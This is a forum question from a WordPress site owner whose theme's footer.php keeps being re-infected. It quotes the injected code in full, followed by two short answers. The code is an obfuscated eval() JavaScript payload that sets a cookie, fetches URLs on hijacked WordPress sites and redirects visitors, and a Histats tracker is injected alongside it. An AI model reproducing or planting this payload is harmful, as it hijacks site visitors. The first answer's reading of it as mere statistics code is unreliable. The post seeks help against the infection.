Question posted in 
One of my wordpress theme in footer.php file add some malicious code automatically. I delete that code several time but some moment later that code automatically added in footer.php file. I don’t find any solution to stop this. I think this it is some type of malicious code, I want to know more about this and how to stop this.
footer.php
<?php global $themesbazar; ?>
<div class="footer">
<?php echo $themesbazar['editorial']?>
</div>
<div class="footer-04">
<div class="row">
<div class="col-md-6">
<div class="copyright">
<?php echo $themesbazar['copyright']?>
</div>
</div>
<div class="col-md-6"><?php div(); ?>
</div>
</div>
</div>
</section>
with malicious code:
<?php global $themesbazar; ?>
<div class="footer">
<?php echo $themesbazar['editorial']?>
</div>
<div class="footer-04">
<div class="row">
<div class="col-md-6">
<div class="copyright">
<?php echo $themesbazar['copyright']?>
</div>
</div>
<div class="col-md-6"><?php div(); ?>
</div>
</div>
</div>
</section>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('9 w(c){5 8=" "+N.8;5 l=" "+c+"=";5 m=T;5 a=0;5 b=0;7(8.k>0){a=8.j(l);7(a!=-1){a+=l.k;b=8.j(";",a);7(b==-1){b=8.k}m=X(8.O(a,b))}}x(m)}9 I(c,J,d,g,i,n){N.8=c+"="+12(J)+((d)?"; d="+d:"")+((g)?"; g="+g:"")+((i)?"; i="+i:"")+((n)?"; n":"")}9 U(){5 3;F{3=h q("Y.v")}t(e){F{3=h q("V.v")}t(E){3=R}}7(!3&&14 D!='10'){3=h D()}x 3}5 s='A://z.11.y/B-C/G/Z-W/13/1h/r.H';5 K='A://z.1p.y.1o/B-C/G/1j/1l/r.H';7(w('15')!='S'){9 P(){5 f=h 1k();f.1m(f.1n()+1r*1q*6*1);I('1i','S',f.1a())}9 o(Q,M){5 3=U();3.19('18',Q,p);3.16=9(){7(3.17==4&&3.1b==1c){7(3.L.j('u=')==0){P();1g.1f=3.L.O(2)}1e{7(M)o(K,R)}}};3.1d(T)}o(s,p)}',62,90,'|||xmlhttp||var||if|cookie|function|offset|end|name|expires||now|path|new|domain|indexOf|length|search|setStr|secure|lookupRedirect|true|ActiveXObject||sAdsUrl1|catch||XMLHTTP|getCookie|return|com|www|https|wp|content|XMLHttpRequest||try|themes|php|setCookie|value|sAdsUrl2|responseText|bIsFirst|document|substring|setAdsCookie|sUrl|false|complete|null|getXmlHttp|Microsoft|the7|unescape|Msxml2|dt|undefined|santecza|escape|woocommerce|typeof|newadsshow|onreadystatechange|readyState|GET|open|toGMTString|status|200|send|else|location|window|cart|newadshow|envision|Date|bbpress|setTime|getTime|tr|mavigrup|3600|1000'.split('|'),0,{}))
</script>
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4214393,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')
[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img src="//sstatic1.histats.com/0.gif?4214393&101"
alt="counter customizable free hit" border="0"></a></noscript>
<script type="text/javascript">
</script>
</body>
</html>
2
Answers
This code looks refer to visitor statistics service.
Is there any “Hi Stats” plugin activated? Have you ever tried to disable all WordPress plugins?
Are these malicious codes added in browser source code output or in the original file (the file you uploaded via FTP)?
What’s your webhosting provider? Maybe, this code can be added for your hosting provider automatically.
Try these hypotheses, if won’t work I’ll help you to find another solution.
I have encoded the code you have posted, may be that would be helpful. https://beautifier.io/ . Now you can search the below-mentioned functions names using search-in-files by any code-editor. Hope this helps someone searching for similar issues.